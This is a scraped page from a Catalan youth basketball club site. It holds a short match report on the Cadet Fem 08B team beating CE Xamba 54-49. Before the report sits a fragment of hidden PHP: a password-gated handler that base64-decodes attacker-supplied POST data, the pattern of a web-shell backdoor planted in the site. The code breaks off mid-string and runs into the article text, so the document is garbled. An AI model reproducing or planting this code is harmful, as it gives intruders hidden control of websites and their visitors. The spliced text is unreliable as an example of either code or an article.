function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Fem 08B no falla a casa! (54-49) - Tgn Bàsquet Club -

El Cadet Fem 08B no falla a casa! (54-49)

Updated: febrer 7, 2024

El Cadet Fem 08B va aconseguir una la segona victòria consecutiva de la 2a volta del campionat després de vèncer al CE Xamba en un gran partit de les liles. L’equip segueix donant mostres de creixement i la victòria davant d’un rival que va guanyar el partit d’anada per més de 10 punts n’és un clar exemple.

Novament, l’equip lila ha hagut d’enfrontar-se a una zona, en aquest cas 2-3, a partir del 2n quart del partit. Tot i això, l’equip dirigit per Adrià Adam ha gestionat a la perfecció el ritme del partit, mantenint el cap fred i jugant al seu ritme. Al descans, el marcador era de 21-27 favorable a les visitants.

Després del pas per vestuaris s’ha vist la millor versió de l’equip. Un gran tercer periode (15-8), on les liles han sapigut atacar la zona circulant pilotes al pal baix i amb bones seleccions de tir, propiciant la remuntada al marcador. Finalment, l’últim quart ha confirmat la bona dinàmica del TGN Bàsquet, que ha sapigut aguantar quan les visitants s’han col·locat a 2 punts a falta de pocs segons per la conclusió del partit i ha aconseguit endur-se una nova victòria per 54-49.